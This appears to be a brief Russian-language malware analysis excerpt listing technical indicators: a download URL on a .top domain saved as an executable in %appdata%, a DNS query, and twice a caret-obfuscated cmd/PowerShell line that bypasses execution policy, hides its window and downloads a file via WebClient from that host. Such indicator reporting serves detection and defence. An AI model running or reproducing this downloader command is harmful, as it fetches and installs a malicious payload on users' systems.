Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^ersHe^L^l.ExE^ -^E^xE^CuT^iO^NPol^i^c^Y byPASS^ -nO^pR^o^FiLE^ -^wI^N^D^oWsTy^L^E HidD^En (New^-o^b^j^ect^ Sy^s^tEm.NET.We^b^cLIeN^t^).^DoWnLo^a^dfILE(^'http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "Pow^ersHe^L^l.ExE^ -^E^xE^CuT^iO^NPol^i^c^Y byPASS^ -nO^pR^o^FiLE^ -^wI^N^D^oWsTy^L^E HidD^En (New^-o^b^j^ect^ Sy^s^tEm.NET.We^b^cLIeN^t^).^DoWnLo^a^dfILE(^'http://www.zonedopesa...' (со скрытым окном)